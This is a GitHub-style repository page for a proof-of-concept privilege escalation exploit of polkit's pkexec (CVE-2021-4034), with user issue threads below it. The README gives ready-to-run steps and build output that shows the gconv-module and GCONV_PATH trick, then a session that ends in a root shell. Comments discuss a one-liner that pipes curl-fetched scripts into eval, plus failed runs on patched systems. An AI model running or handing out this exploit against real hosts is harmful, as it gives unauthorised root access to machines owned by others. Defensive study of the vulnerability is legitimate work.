CVE-2021-4034 One day for the polkit privilege escalation exploit

Overview

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just run make, then ./cve-2021-4034, and enjoy your root shell.

The original advisory by the real authors is here

PoC

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Updating polkit on most systems patches the vulnerability; against a patched pkexec the exploit fails, so you'll just get the pkexec usage text and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
Comments
  • RFE: Testing instead of actual rooting

    What I need is to deploy a safe C binary to detect this CVE. Return exit code 1 if not already patched, without actually rooting the system, and return 0 if the system is patched. Can this RFE be added?

    opened by tjyang 8
  • The value for the SHELL variable was not found the /etc/shells file

    GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
    The value for the SHELL variable was not found the /etc/shells file

    This incident has been reported.

    opened by condesings 6
  • One-liner: Use `eval` for the commands

    This will execute shell scripts that are `curl`ed using the current shell.
    
    Fixes the pipe (stdin) problems when executing the ELF; alternatively,
    using `bash` or `zsh` you can use process substitution.
    
    opened by owl4ce 2
  • pwnkit: Adds full PATH support

    This will take full control of executables on certain Linux systems that
    don't use /usr merge as their filesystem layout, for example Gentoo.
    

    https://wiki.gentoo.org/wiki//usr_move#Current_filesystem_layout
    https://freedesktop.org/wiki/Software/systemd/TheCaseForTheUsrMerge

    opened by owl4ce 2
  • Not work

    zanyxdev@xxxxxxx:~/forks_projets/CVE-2021-4034$ ./cve-2021-4034
    pkexec --version |
           --help |
           --disable-internal-agent |
           [--user username] PROGRAM [ARGUMENTS...]

    See the pkexec manual page for more details.
    zanyxdev@xxxxxxx:~/forks_projets/CVE-2021-4034$ pkexec --version
    pkexec version 0.105

    Linux xxxxxx 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64 GNU/Linux
    policykit-1-doc/stable-security,stable-security 0.105-31+deb11u1 all
    policykit-1-gnome/stable,now 0.105-7 amd64
    policykit-1-gnome/stable 0.105-7 i386
    policykit-1/stable-security,now 0.105-31+deb11u1 amd64
    policykit-1/stable-security 0.105-31+deb11u1 i386

    opened by ZanyXDev 2
  • Makefile: Force `cp` to overwrite the existing one

    This fixes the case where the permissions of `true` on some Linux systems don't
    include write privileges, while those permissions are fully preserved by cp.
    

    On my Gentoo system, coreutils uses multicall, where the content of /bin/true is just a shebang with arguments and no write permissions. This only applies if one wants to run make again without cleaning first (one-liner).

    $ file /bin/true
    /bin/true: a /usr/bin/coreutils --coreutils-prog-shebang=true script, ASCII text executable
    $ getfacl /bin/true
    getfacl: Removing leading '/' from absolute path names
    # file: bin/true
    # owner: root
    # group: root
    user::r-x
    group::r-x
    other::r-x
    
    opened by owl4ce 1
  • Doesn't do anything

    ~/CVE-2021-4034 $ ./cve-2021-4034
    ~/CVE-2021-4034 $ echo $?
    127
    ~/CVE-2021-4034 $ echo $UID
    1000
    

    It neither escalates privileges nor prints the pkexec usage. It just exits with exit code 127.

    opened by eternal-sorrow 0
  • doesn't do anything

    ~/CVE-2021-4034 $ ./cve-2021-4034
    ~/CVE-2021-4034 $ echo $?
    127
    

    I think it's an error related to environment variables; how can I solve it? If it is not an environment variable problem, I would appreciate it if you could tell me the cause and solution.

    opened by rioju412 0
Owner
Davide Berardi